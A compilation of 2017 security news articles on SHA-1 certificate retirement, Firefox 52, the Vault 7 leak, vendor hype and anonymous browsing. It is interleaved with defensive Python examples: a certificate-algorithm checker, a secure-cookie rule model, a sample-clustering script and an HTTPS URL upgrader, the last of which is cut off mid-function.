Not only did CAs migrate to the more secure SHA-2 certificates on Jan. 1, 2017, but major browser makers also decided to adopt the change, including Google, Microsoft and Mozilla, and their browsers no longer trust sites that use SHA-1 certificates. Even Facebook announced plans to retire SHA-1.

Despite that, many webmasters are still behind with the transition, as 21% of all websites that use certificates still use the insecure cryptographic hash function, Venafi says, based on the analysis of over 33 million publicly visible IPv4 websites. Granted, things are looking much better compared to last fall, when 35% of websites were still using SHA-1, but recent research has proven that the crypto function is officially broken.

SHA-1 has been long said to be vulnerable to collision attacks, but it wasn’t until this year that the function was proven fundamentally broken. What’s surprising, however, is that webmasters didn’t transition to SHA-2 or SHA-3 sooner. It’s doubtful that they would knowingly leave their sites vulnerable.

“I suspect that many organizations may simply be unaware that they still have any SHA-1 certificates on their networks because they are relying on certificate authority (CA) tools to manage their keys and certificates. The problem with this approach, especially now that free and very low cost certificates are widely available, is that anyone in your organization can get and install a certificate that uses weak hashing algorithms and install it on your network,” said Venafi’s Shelley Boose.

In addition to making both websites and their users vulnerable to attacks, the continuous use of SHA-1 can also disrupt the browsing experience, because web browsers display warnings when encountering insecure sites, prompting users to look for alternatives. The green padlock that browsers display to mark HTTPS transactions will no longer be associated with SHA-1 sites, and performance issues might also alter users’ experience, Venafi notes.
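The inventory problem Venafi describes can be checked from the outside: what matters to browsers is the signature algorithm recorded in the leaf certificate a server presents. The following is an added example, not Venafi's tooling or code from the report. It walks just enough DER to read the outer signatureAlgorithm of an X.509 certificate and flags the SHA-1 variants; the `check_site` helper fetches a live certificate with the standard library, and the constructed certificate skeletons at the end exist only so the checker can be exercised offline (they are not real certificates).

```python
"""Find SHA-1-signed certificates without third-party packages.

Added example for this article; not Venafi's code. Only the standard library
is used. Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm,
signatureValue }, and signatureAlgorithm is what browsers judged.
"""
import ssl
from typing import Dict, Tuple

# Signature-algorithm OIDs that rely on SHA-1 (values from RFC 3279 / RFC 5754).
SHA1_SIGNATURE_OIDS: Dict[str, str] = {
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10040.4.3": "dsa-with-sha1",
}
# A few SHA-2 algorithms so that reports show a readable name instead of an OID.
SIGNATURE_OID_NAMES: Dict[str, str] = {
    **SHA1_SIGNATURE_OIDS,
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
    "1.2.840.10045.4.3.3": "ecdsa-with-SHA384",
}


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER tag/length/value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(value: bytes) -> str:
    """Decode OBJECT IDENTIFIER contents to dotted form (first arc 0, 1 or 2)."""
    arcs = [value[0] // 40, value[0] % 40]
    acc = 0
    for b in value[1:]:                      # base-128, high bit set on all but the last byte
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm(cert_der: bytes) -> str:
    """Return the dotted OID of the signatureAlgorithm in a DER-encoded certificate."""
    tag, cert, _ = read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _tbs, pos = read_tlv(cert, 0)         # skip tbsCertificate entirely
    _, alg_id, _ = read_tlv(cert, pos)       # AlgorithmIdentifier ::= SEQUENCE { OID, params }
    tag, oid, _ = read_tlv(alg_id, 0)
    if tag != 0x06:
        raise ValueError("expected OBJECT IDENTIFIER in AlgorithmIdentifier")
    return decode_oid(oid)


def is_sha1_signed(cert_der: bytes) -> bool:
    """True when the certificate's signature uses a SHA-1 based algorithm."""
    return signature_algorithm(cert_der) in SHA1_SIGNATURE_OIDS


def check_site(host: str, port: int = 443) -> Tuple[str, bool]:
    """Fetch the leaf certificate a live server presents and classify it (needs network)."""
    der = ssl.PEM_cert_to_DER_cert(ssl.get_server_certificate((host, port)))
    oid = signature_algorithm(der)
    return SIGNATURE_OID_NAMES.get(oid, oid), oid in SHA1_SIGNATURE_OIDS


# --- constructed fixtures (not real certificates) for offline exercise of the checker ---
def _der(tag: int, payload: bytes) -> bytes:
    """Minimal DER encoder used only to build fixtures."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def _encode_oid(dotted: str) -> bytes:
    """Inverse of decode_oid, for building fixtures."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def constructed_cert(sig_oid: str) -> bytes:
    """Certificate-shaped DER skeleton with the given signature OID (placeholder TBS and signature)."""
    tbs = _der(0x30, _der(0x02, b"\x01"))
    alg = _der(0x30, _der(0x06, _encode_oid(sig_oid)) + _der(0x05, b""))
    sig = _der(0x03, b"\x00" * 17)
    return _der(0x30, tbs + alg + sig)
```

Run `check_site("your-host.example")` against each externally reachable host in an inventory; a `True` second element means the leaf is still SHA-1 signed. Only the leaf and intermediates matter: the self-signature on a root in the trust store is not verified by browsers, so a SHA-1 root is not by itself a finding.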


Firefox 52 Warns of Login Fields on Insecure Pages

8.3.2017 securityweek Safety
Released this week, the latest version of the Firefox Web browser warns users when they are entering their passwords on pages that are not secure.

The change was initially announced last year, when Mozilla introduced the warning in Firefox DevEdition 46, in an attempt to raise awareness of the risks that requesting sensitive information over non-secure connections poses. Last year, the warning was meant for developers, but the latest browser release brings it to end-users as well.

Starting with Firefox 52.0, users will receive a warning when encountering non-secure HTTP pages with logins. A “This connection is not secure” message will be automatically displayed when the user clicks into the username and password fields on any page that doesn’t use HTTPS.

Starting with the release of Firefox 51 in January, the browser has been displaying a struck-through lock icon for all pages that don’t use HTTPS, to make it clear that those pages are not secure. It even displayed a warning when users were entering a password on an insecure page. Now, the warning message is displayed as soon as the user clicks on the username or password field.

Firefox 52 also implements the Strict Secure Cookies specification, thus forbidding insecure HTTP sites from setting cookies with the “secure” attribute. In the newly published release notes, Mozilla explains that this change will prevent insecure sites from setting cookies with the same name as an existing “secure” cookie from the same base domain.
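The two rules behind that change are easy to state in code. The block below is an added example, not Mozilla's implementation: a toy in-memory cookie store that applies the checks from the IETF "cookie alone" draft (the basis of Strict Secure Cookies). A non-secure origin cannot set a cookie carrying the Secure attribute, and it cannot create a cookie that would shadow an existing Secure cookie of the same name on a related domain and matching path. The domain and path matching follow RFC 6265 section 5.1; the cookie names and domains used in the checks are constructed.

```python
"""Toy model of the Strict Secure Cookies rules Firefox 52 enforces.

Added example (not Mozilla's code). It implements the two checks from the IETF
draft "Deprecate modification of 'secure' cookies from non-secure origins" on a
minimal in-memory cookie store.
"""
from dataclasses import dataclass, field
from typing import List


@dataclass
class Cookie:
    name: str
    value: str
    domain: str            # host the cookie belongs to, e.g. "example.com"
    path: str = "/"
    secure: bool = False   # the Secure attribute


@dataclass
class CookieStore:
    cookies: List[Cookie] = field(default_factory=list)


def domain_matches(host: str, domain: str) -> bool:
    """RFC 6265 5.1.3: host equals domain or is a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """RFC 6265 5.1.4 path-match."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def set_cookie(store: CookieStore, scheme: str, new: Cookie) -> bool:
    """Apply the strict-secure-cookie rules; return True if the cookie was stored."""
    secure_origin = scheme == "https"

    # Rule 1: a non-secure origin may not set a cookie flagged Secure.
    if new.secure and not secure_origin:
        return False

    # Rule 2: a non-secure origin may not add a cookie that would shadow an
    # existing Secure cookie with the same name on a related domain and path.
    if not secure_origin:
        for old in store.cookies:
            if (old.name == new.name and old.secure
                    and (domain_matches(old.domain, new.domain)
                         or domain_matches(new.domain, old.domain))
                    and path_matches(new.path, old.path)):
                return False

    # Otherwise replace any cookie with the same (name, domain, path), else append.
    store.cookies = [c for c in store.cookies
                     if (c.name, c.domain, c.path) != (new.name, new.domain, new.path)]
    store.cookies.append(new)
    return True
```

The second rule is the one that stops the classic trick of an attacker on a plain-HTTP origin overwriting a site's session cookie: with a Secure `session` cookie stored for `example.com`, a later `Set-Cookie: session=...` from `http://www.example.com` is rejected, while unrelated non-secure cookies are still accepted.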

The browser update brings a variety of bug fixes as well, including patches for Critical issues: asm.js JIT-spray bypass of ASLR and DEP; Memory Corruption when handling ErrorResult; Use-after-free working with events in FontFace objects; Use-after-free using addRange to add range to an incorrect root object; Use-after-free working with ranges in selections; and memory safety bugs.

High risk vulnerabilities were also addressed in Firefox 52, such as: Segmentation fault in Skia with canvas operations; Pixel and history stealing via floating-point timing side channel with SVG filters; Memory corruption during JavaScript garbage collection incremental sweeping; and Use-after-free in Buffer Storage in libGLES (affecting Windows computers only).

Firefox 52.0 was released with support for all major desktop platforms, namely Linux, macOS, and Windows. Furthermore, it is part of the ESR (Extended Support Release) branch, meaning that it should receive support for about a year.


"Vault 7" Leak Shows CIA Learned From NSA Mistakes

8.3.2017 securityweek BigBrothers
WikiLeaks’ “Vault 7” release appears to confirm that the U.S. National Security Agency (NSA) was behind the threat actor tracked as the “Equation Group.” Documents also show that the Central Intelligence Agency (CIA) learned from the NSA’s mistakes after its activities were exposed by security researchers.

Files allegedly obtained from a high-security CIA network provide details on the intelligence agency’s vast hacking capabilities. One of the files made available by WikiLeaks contains a discussion thread titled “What did Equation do wrong, and how can we avoid doing the same?”

The operations of the Equation Group and its links to the NSA were detailed by Kaspersky Lab in February 2015, and the discussion made public by WikiLeaks was initiated a few days later.

Participants in the discussion pointed out that one of the NSA’s biggest mistakes was that its tools shared code, including custom cryptography, giving researchers the data needed to connect different malware to the same group.

“The ‘custom’ crypto is more of NSA falling to its own internal policies/standards which came about in response to prior problems,” one user wrote.

In addition to the shared custom cryptographic algorithm, the CIA identified several other mistakes made by the NSA, including the reuse of exploits, the use of internal tool names in the code, and the use of a unique mutex.

“All their tools shared code. The custom RC5 was everywhere. The techniques for positive ID (hashing) were used in the same way in multiple tools across generations,” another user said.

“The shared code appears to be the largest single factor in allowing [Kaspersky Lab] to tie all these tools together. The acquisition and use of C&C domains was probably number 2 on the list, and I'm sure the [Computer Operations Group] infrastructure people are paying attention to this.”
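The attribution mechanism the discussion thread is worried about can be shown in a few dozen lines. The block below is an added example, not Kaspersky's methodology or anything from the leaked files: it extracts printable strings from a set of sample blobs, discards artifacts that are common across the corpus (library imports and the like), and links samples that share a rare artifact such as a custom crypto constant or a mutex name. All six sample blobs are constructed stand-ins for binaries, and the constant and mutex strings in them are invented.

```python
"""Cluster samples by shared rare artifacts (added example; constructed data).

This is the defender's side of the problem the leaked thread describes: code
reuse, custom crypto constants and unique mutex names link otherwise separate
tools to one origin. Real pipelines use richer features (function hashes,
opcode n-grams); strings are enough to show the idea.
"""
import re
from itertools import combinations
from typing import Dict, List, Set

# Runs of 6+ printable ASCII bytes, the classic `strings` heuristic.
STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")

# Constructed sample blobs. Every "binary" imports the same library names;
# three of them share an invented custom-crypto constant, two also share a mutex.
COMMON = b"kernel32.dll\x00GetProcAddress\x00"
SAMPLES: Dict[str, bytes] = {
    "implant_gen1": COMMON + b"RC5_CUSTOM_ROUNDS_20_P\x00" + b"Global\\mutex_e3a1b\x00",
    "implant_gen2": COMMON + b"RC5_CUSTOM_ROUNDS_20_P\x00" + b"Global\\mutex_e3a1b\x00",
    "dropper":      COMMON + b"RC5_CUSTOM_ROUNDS_20_P\x00" + b"Software\\Classes\x00",
    "unrelated_1":  COMMON + b"C:\\Users\\Public\\log.txt\x00",
    "unrelated_2":  COMMON + b"POST /api/v1/upload HTTP/1.1\x00",
    "unrelated_3":  COMMON + b"password_reset_token\x00",
}


def extract_artifacts(blob: bytes) -> Set[str]:
    """Printable strings found in a blob."""
    return {m.group().decode("ascii") for m in STRING_RE.finditer(blob)}


def rare_artifacts(corpus: Dict[str, Set[str]], max_share: float = 0.5) -> Set[str]:
    """Artifacts present in at most max_share of the samples; the rest is treated as noise."""
    counts: Dict[str, int] = {}
    for arts in corpus.values():
        for a in arts:
            counts[a] = counts.get(a, 0) + 1
    return {a for a, c in counts.items() if c / len(corpus) <= max_share}


def shared_artifacts(samples: Dict[str, bytes], a: str, b: str, max_share: float = 0.5) -> Set[str]:
    """Rare artifacts that samples a and b have in common (the evidence for a link)."""
    corpus = {n: extract_artifacts(blob) for n, blob in samples.items()}
    return corpus[a] & corpus[b] & rare_artifacts(corpus, max_share)


def link_samples(samples: Dict[str, bytes], max_share: float = 0.5) -> List[List[str]]:
    """Group samples transitively by any shared rare artifact (union-find)."""
    corpus = {n: extract_artifacts(blob) for n, blob in samples.items()}
    rare = rare_artifacts(corpus, max_share)
    fingerprints = {n: arts & rare for n, arts in corpus.items()}

    parent = {n: n for n in samples}

    def find(x: str) -> str:
        while parent[x] != x:
            parent[x] = parent[parent[x]]      # path compression
            x = parent[x]
        return x

    for a, b in combinations(samples, 2):
        if fingerprints[a] & fingerprints[b]:
            parent[find(a)] = find(b)

    groups: Dict[str, List[str]] = {}
    for n in samples:
        groups.setdefault(find(n), []).append(n)
    return sorted(sorted(g) for g in groups.values())


if __name__ == "__main__":
    for group in link_samples(SAMPLES):
        print(group)
```

Note that `dropper` is linked to the two implants only through the crypto constant, which is exactly the "custom RC5 was everywhere" complaint above; raising `max_share` would start pulling in library noise and produce false links, which is why the threshold, or a proper allowlist of known-benign strings, matters in practice.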

The Vault 7 files show that in addition to learning from the NSA’s mistakes, the CIA “borrowed” techniques from in-the-wild malware and tools, including Shamoon, UpClicker and the Nuclear exploit kit.

Security firms have started assessing the impact of the exposed hacking capabilities. WikiLeaks has not released any exploits, which makes it difficult to determine exactly what the CIA programs are capable of. However, at first sight, the intelligence agency’s tools don’t appear to be very sophisticated.


Fighting Cyber Security F.U.D. and Hype

8.3.2017 securityweek Cyber

Dr. Ian Levy is technical director at the UK’s National Cyber Security Center (NCSC), which is part of GCHQ. It is fair to say that the NCSC will play a major part in defining and delivering the UK government’s cyber security policy over the next few years.

In October 2016, Ian Levy reportedly made an unusual comment at the Wired Security conference in London. He said,

“If you’re told that cyber security attacks are purported by winged ninja cyber monkeys who sit in a foreign country who can compromise your machine just by thinking about it you’re going to have a fear response. And that’s where we are today. The security companies are incentivized to make it sound as scary as possible because they want you to buy their magic amulets.”
This was not a one-off sentiment voiced on-the-fly. He repeated it in February 2016:

“We are allowing massively incentivized companies to define the public perception of the problem. If you call it an advanced persistent threat, you end up with a narrative that basically says ‘you lot are too stupid to understand this and only I can possibly help you – buy my magic amulet and you’ll be fine.’ It’s medieval witchcraft, it’s genuinely medieval witchcraft.”
The security industry stands accused by the UK’s leading cyber security agency of over-hyping the cyber security threat to sell under-achieving products. It does this in two stages: firstly by defining the threat (by manipulating the media); and secondly by positioning its own product as the sole effective cure (by manipulating the buyer).

Manipulating the Media

The vendor/media relationship is a complex symbiosis. In the age of free news, each needs the other ― but there are well-known, if unspecified, rules. The primary rule is that the media must appear to be entirely independent of vendor influence, even when largely funded by vendor advertising.

The vendor industry is forced to manipulate the media subliminally ― and different parts of the media accept this subliminal manipulation to differing degrees.

Historically, the vendor’s primary tool has been the ‘press release’; but this is now supplemented by the vendor blog. The former is used to frame the company and its product; while the latter is used to frame the threat. The ultimate aim is to define the vendor as the sole cure for a dire threat; and to get the media to describe both in the vendor’s terms.

The serious media will genuinely seek the underlying truth in all it receives. But journalists have their own pressures: the need to write compelling copy that will attract the largest possible readership, and to do so repeatedly to very tight deadlines.

The first requirement (compelling copy) leads to the simple acceptance of new buzz words framed by the vendor to define a major new threat that it discovered, and by implication is best positioned to counter. It only takes a few major publications to use the term for it to rapidly become part of the security lexicon. Examples include kill chain, cyberwar, cyber pearl harbor, ‘perfect storm threatening Europe’, cyber 9/11 and many more.

Ian Levy singles out the use/misuse of ‘advanced persistent threat’ to describe everything. “He pointed out that a UK telco [TalkTalk] had recently been taken offline using a SQL injection flaw that was older than the hacker alleged to have used it. That’s not advanced by any stretch of the imagination, he said.” (TalkTalk originally described the attack as a ‘significant and sustained’ cyber assault.)

The second requirement (tight deadlines) is probably the primary cause of what is now known as ‘fake news’. For the most part, this is not a conspiracy to spread false rumors, but a failure to take sufficient time to check facts rather than simply trust sources.

Fake news is not new — it has existed for as long as there have been reporters. Examples include CNN’s 1999 report that Kevin Mitnick “hacked into the North American Defense Command (NORAD), a feat that inspired the 1983 film ‘War Games’.” He didn’t do that. And the late 2016 Washington Post headline, “Russian hackers penetrated U.S. electricity grid through a utility in Vermont, U.S. officials say.” That didn’t happen.

If Levy is correct, security vendors have been remarkably successful in subtly manipulating the media to frame the security threat in their own terms: that is, “cyber security attacks are purported by winged ninja cyber monkeys who sit in a foreign country who can compromise your machine just by thinking about it…” But he goes on to imply that the purpose of this manipulation is to make it easier to sell “magic amulets”. This last part requires manipulating the buyers into believing in the amulets.

Manipulating the Buyer

It is easy to forget that vendors are businesses, and their primary purpose is to make a profit. “I used to work selling security software,” comments Drew Koenig, now security solutions architect with Magenic. “The primary goal is not to solve the security problems, but sell you a product that you think can solve your security problems.”

Sales methods
It is the methods used to sell the product regardless of effectiveness that worry some buyers; and the ability to see through these methods only comes with experience. Martin Zinaich, information security officer with the City of Tampa, has found salesmen will not necessarily take his ‘no’ for an answer. “I actually find vendors, when I express my appreciation of their product but do not see a true business fit, will start calling my younger staff. They know the shiny stuff can win a sale.”

One vendor told him to use FUD (fear, uncertainty and doubt) to get budget to buy product. It didn’t work: “I never have and never will. The reality is the business relies on its professionals to act as such. If there is a real risk, we need to attack it. If there is perceived risk, we need to evaluate it.”

A second problem is that salesmen do not necessarily understand either the technicalities of the product they must sell, or the specific demands of the security market ― and resort to their own version of FUD or fibs to make a sale.

Malware researcher Rob Slade gave an example. At a vendor presentation, he was told this great new product will automatically make your products more secure. He asked if there was any assurance requirement that would mandate every developer use the product in a secure fashion. “The salesman gave a long-winded response,” said Slade, “that said you could use the product in a secure way, but, actually, it didn't require you to. In other words, he gave a verbose answer that boiled down to ‘no’. I strongly suspect that the presenter didn't know he was lying to me. He probably didn't even know what an assurance requirement was.”

Marketing budgets
Surprisingly, the size of security product marketing budgets is also seen as an issue. “Vendor marketing budgets are a massive problem,” says security author Raef Meeuwisse; “especially as the largest budgets are often backing the most out of date and ineffective security technologies. It often feels like the larger the ads, the less the vendor has to sell.” He believes that this has a direct effect on the size of the security market, because it “helps us buy security brands that have been around for a while rather than security solutions that often work considerably better.” The whole issue, he suggests, is then made worse by “commercial research companies whose business model requires that they only actively promote the companies paying in the most research money.”

Ilia Kolochenko, CEO of High Tech Bridge, points out that it isn’t just the budgets of the big firms that cause problems. “We should keep in mind that numerous VCs that appeared on the bubbling market of venture capital during the last few years are also responsible for hype and FUD in cyber security.”

Venture capital makes its money by buying low and selling high. It gambles that a new small company will become a big powerful company through increased sales before it cashes in on its investment. In short, venture capital is motivated by increasing sales rather than improving product. “Many of them,” explains Kolochenko, “put pressure on the company to increase sales by any means, selling to everyone, without really thinking if the client will get any benefit from their technology. This is why today many startups are trapped by easy-cash distributed by VCs, and now must spend all their time and other resources on aggressive sales rather than on technology. Entrepreneurs should remember that there is no free cash.”

But it’s not a new problem, and it doesn’t just apply to cyber security. “There’s a degree of sensationalism that product marketers have always applied, not just now,” comments Bill Burns, chief trust officer and cloud business transformation at Informatica. “They’re always looking for ‘an edge’ to capture the market’s attention.”

Fighting the F.U.D.

“It is the business, guided by our experience and input, which needs to make the final decision,” says Zinaich. “The fact is, more squirrels have taken out power around the globe than any hacker has to date. It is not even close. Yet, the fragile ‘House of Internet Things’ we are rapidly building is full of risk. That risk has to be managed in the light of reality, not by carnival barkers.”

There is an acceptance among security leaders that security vendors will hype the products and FUD the threat, and that it is down to the professionals’ own knowledge and experience to get to the right product at the right price for their own environment. “I've found the best approach is to leverage proof-of-concepts on every solution we are considering,” comments John Masserini, CISO at MIAX Options. “Not only does it vet the hype from the reality, but it also gives you a deep understanding of the operational impact the solution will have on your specific infrastructure. This is an often-overlooked aspect of many security solution providers and could be far more challenging than the risk you're trying to mitigate. Make them prove their functionality in your specific environment before ever signing a check.”

Meeuwisse takes a similar view. “My main advice is this: security technology is moving so fast, don’t buy anything on an uncancellable multi-year deal. You never know when it will start to become an inferior or outdated product or service.”

Steve Lentz, chief security officer at Samsung Research America, goes further ― he almost makes it personal. He doesn’t want a product that does what it says, he wants one that does more. “When I can get a vendor where I can trust that they will always do more, that is a big plus. This also includes that their support is top notch; and they better give me their best price the first time. If I have to keep haggling for a lower/best price they are out. If I have to send an email to their VP of Support and Sales, saying ‘your support sucks!’, they are out. If the vendor does what he says and more, and we prove that by first POCing and then purchasing, they usually stay in our security environment. I will renew as long as they keep this up.”

The best way to combat vendor hype and FUD, says Koenig, “is to know what your security problems are before you look at vendors to solve them. Only a business knows what problems you have ― a guy in a booth or cold calling you shouldn’t tell you what problems they think you have.”

When you fully understand the problems you have, he continues, “then go research the vendors yourself, hit the forums, ask your peers before you pick up the phone, talk to everyone but the vendor before you talk to the vendor. When it comes time to bring the vendor in always have the vendor prove it. Make them show the tools solving your problems, not a vendor made canned demo that will work 100% of the time showing you the buzzwords in action. Whatever you decide you will have to deal with it long after the sales team moves on. If you bring something in that doesn’t solve your problems, the vendor won’t be held accountable.”

‘Try before you buy’ is the repeated recommendation. Bill Burns thinks this is a new and growing option that may eventually solve the hype and FUD problem. “With the advent of mobile, SaaS and cloud computing, companies can now offer ‘trial versions’ of their software on the same infrastructure and offer the same user experience as the ‘real product’. Vendors can now show off their products ― warts and all ― directly to their target customers with the obligation to prove value in their product. The time between ‘awareness of an unmet need’ and ‘testing a solution’ is growing smaller quickly; good marketers know that relying on ‘hype’ will generate a negative reaction even faster than before.”

The Ultimate Solution

There is no ultimate solution. Salesmen will continue to sell the products they represent rather than the correct solutions. Publications will continue to seek readers by making their news stories as ‘interesting’ as possible. The combination will always drift towards Ian Levy’s winged ninja cyber monkeys; but if Bill Burns is correct, the new Information Age may make it a self-correcting issue through the democratization of information. The new element is the citizen journalist ― the independent blogger who does not hesitate to correct the professional journalist who makes a mistake, nor criticize a product that is over-hyped or inadequate. Independent blogs will keep both publications and vendors honest.

David Harley is both a security researcher and a prolific blogger. “There's no doubt that emotive language relating to warfare and/or epidemiology has long been a staple of security-related marketing (and journalism!). I can't say I like it – much of my career in security has been devoted to damping down the fires of hyperbole and advocating less drama and more precision,” he says.

“But I'm most concerned by the misuse of language in ways that are actually deceptive rather than everyday sloppiness. It annoys me (quite disproportionately) when a system is described as 'infected' when 'compromised [by some form of Trojan]' would be more accurate; or when people use 'virus' as a synonym for 'malware'. However, I regard it as frankly deceptive when people evade the distinction between 'successful attacks' and 'attempted attacks' because saying 'ten million systems were attacked' is more dramatic and makes a marketing point more effectively than adding that '0.001% of attacks were actually successful'...

Over time, bloggers like Harley could disarm, if not remove, the winged cyber ninja monkeys by keeping journalists honest and vendors truthful.


How to Browse The Internet Securely And Anonymously
8.3.2017 securityaffairs Security

These are some of the top methods you can use to browse the internet securely and anonymously.
Even as the world becomes more aware of the imminent threat to our online privacy, few people understand the need to hide crucial information, such as IP addresses and private data streams, from entities such as our Internet Service Providers (ISPs), various online advertising companies, and our governments. Thankfully, fortifying your online privacy is not rocket science.

With the array of online encryption tools such as IP Changer software, Virtual Private Networks, and the popular Tor Browser, internet users are not short of options. Herein are some of the best ways to browse the internet securely and anonymously.

Tor
The Onion Router, abbreviated and more commonly known as Tor, is one of the most sought-after online anonymity tools. Tor focuses on making your location untraceable by masking your IP address under layer upon layer of smokescreen and encryption to cover up the origin of your connection.

A sizeable percentage of the internet is already using the Tor Browser – a modified version of the Mozilla Firefox browser – to keep their identities hidden while online. Not only does it act as an IP changer, it also keeps trackers at bay. Tor can be described as the most user-friendly option in this list, and also the most all-encompassing encryption tool, since it integrates more than one encryption technique in the form of browser extensions to give users comprehensive online security. Being an open-source project, it is also completely free.

However, using the Tor browser will still require you to change your online behavior in order to retain maximum anonymity. It comes with a number of warnings, tips, and tricks that every privacy-conscious individual should follow when browsing the internet. Tor is not without its limitations but has so far proved to be the most viable option for people of all calibers.

Virtual Private Networks
VPNs are considered heavy-duty online anonymity tools for a reason. These services focus on helping users disguise their traffic in addition to keeping their IP addresses hidden whenever they connect to the internet. They are also considered powerful IP changer software. VPNs only encrypt your internet traffic, though, meaning that your ISP will still be able to see how much traffic you generate from website to website, but will not be able to see the actual content. The same applies to snooping governments and any malicious parties who may wish to steal vital information such as your login credentials.

The only catch is that a good VPN service will cost you. However, the expense can often be overlooked because this technique does not have a lot of weaknesses. If you’re living in a country where the government has sanctioned the blocking of all VPN connections, there are stealth VPNs that will allow you to browse the internet undetected. As such, VPNs are the preferred option for people living in countries with extreme internet censorship and heavy government surveillance.

Browser Extensions for Privacy
For much lighter, but just as effective online privacy, users can always choose to install a privacy-centric browser extension. At the top of the list of extensions users can get is Ghostery, which is compatible with Chrome, Firefox, and Internet Explorer, and EFF’s Privacy Badger. Unlike VPNs and Tor, browser extensions will not function as IP changer software since they do not hide your IP address.

The only notable difference between the two extensions is that Ghostery is more hands-on than Privacy Badger is. With Ghostery, you are allowed to tweak your privacy settings, such as which trackers to block. It also allows you to see all the trackers that are being used on you for every website that you visit, allowing you to choose which websites to show your information to and which to block out completely. It is quite handy when it comes to keeping advertisers from logging your information.

Privacy Badger, on the other hand, is a bit more intuitive than the former option. This extension monitors websites that are tracking your browsing habits and either blocks those websites entirely or keeps their tracking methods from working on you. Despite being based on an ad-blocking codebase, it does a lot more than just keep you safe from annoying ads. Its intuitive design allows it to learn from your browsing habits, meaning that you don’t have to constantly adjust the settings.

Changing Your IP Address
IP bans are the primary reason why people change their IP addresses. Whether a certain online service is not yet available in your country or you have been explicitly banned from a specific website, changing your IP address can be a viable way of gaining access to the website.

Methods range from the fairly complicated manual method, which involves resetting your modem or using different devices, to downloading IP changer software.

The latter option is often preferred over the former. IP changer software can be used to change your IP address multiple times even if you’re using the same device. Unlike the other tools described here, however, IP changer software only replaces the IP address that others see; it does not mask your traffic or help you block any trackers. It simply presents a different IP address than the one that is actually assigned to you.

You might opt for IP changer software if your privacy needs are basic. It simply throws off your ISP and government on your real location, sometimes helping you circumvent government-imposed censorship and other bans put in place by your ISP. IP changer software is by no means a comprehensive option like Tor or VPNs, but it does work. You can choose from a wide range of IP changer software on the internet, or alternatively, you can go for a VPN service that provides the IP changer option to keep your real location well under wraps.

HTTPS Everywhere
Even as the internet as a whole moves toward full adoption of SSL, a notable percentage of websites still does not support the protocol, which is essential for keeping web traffic safe from malicious interception. Websites that still serve unencrypted connections by default are significantly less safe.

The HTTPS Everywhere browser extension lets users force an HTTPS connection on countless websites. Because it depends on the website being visited actually supporting HTTPS, it is not the strongest option in this list, but it remains a viable one.
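As an added illustration (not code from the article, nor from the HTTPS Everywhere project itself), the following Python sketch shows how a rule-driven HTTPS upgrader of this kind decides whether to rewrite a URL, and why it can do nothing for a site that offers no HTTPS. The sites, hostnames and exclusions in the ruleset are invented for the example.

```python
"""Constructed illustration of a rule-driven 'force HTTPS' URL rewriter.
The rules below are invented for this example; they are not the real
HTTPS Everywhere ruleset."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlsplit, urlunsplit


@dataclass
class Rule:
    """One site's upgrade rule: which hosts it covers, which URLs on those
    hosts must be left alone because the site serves them only over plain
    HTTP (the edge case a blanket 'force HTTPS' would break), and an
    optional hostname canonicalisation (e.g. bare domain -> www)."""
    name: str
    hosts: List[str]                                      # exact names or "*.example" wildcards
    exclusions: List[str] = field(default_factory=list)   # regexes matched against the full URL
    host_rewrite: Optional[Tuple[str, str]] = None        # (from_host, to_host)

    def covers(self, host: str) -> bool:
        for pattern in self.hosts:
            if pattern.startswith("*."):
                if host == pattern[2:] or host.endswith(pattern[1:]):
                    return True
            elif host == pattern:
                return True
        return False


# Constructed ruleset for hypothetical sites.
RULES = [
    Rule(name="Example Corp", hosts=["example.com", "*.example.com"],
         exclusions=[r"^http://status\.example\.com/"],   # assumed HTTP-only status page
         host_rewrite=("example.com", "www.example.com")),
    Rule(name="Blog", hosts=["blog.example.org"]),
]


def upgrade_url(url: str, rules=RULES) -> Tuple[str, Optional[str]]:
    """Return (possibly rewritten URL, name of the rule applied or None).

    Only http:// URLs on hosts covered by a rule are upgraded. Everything
    else (already https, other schemes, unknown hosts, excluded paths,
    explicit non-default ports) is returned unchanged: the rewriter can
    only force HTTPS where a curated rule says the site supports it.
    """
    parts = urlsplit(url)
    if parts.scheme != "http":
        return url, None
    host = parts.hostname or ""
    for rule in rules:
        if not rule.covers(host):
            continue
        if any(re.search(pattern, url) for pattern in rule.exclusions):
            return url, None
        if parts.port is not None:
            # An explicit port such as :8080 is almost never a TLS port;
            # rewriting the scheme alone would produce a broken URL.
            return url, None
        new_host = host
        if rule.host_rewrite and host == rule.host_rewrite[0]:
            new_host = rule.host_rewrite[1]
        return urlunsplit(parts._replace(scheme="https", netloc=new_host)), rule.name
    return url, None


def upgrade_all(urls: List[str]) -> dict:
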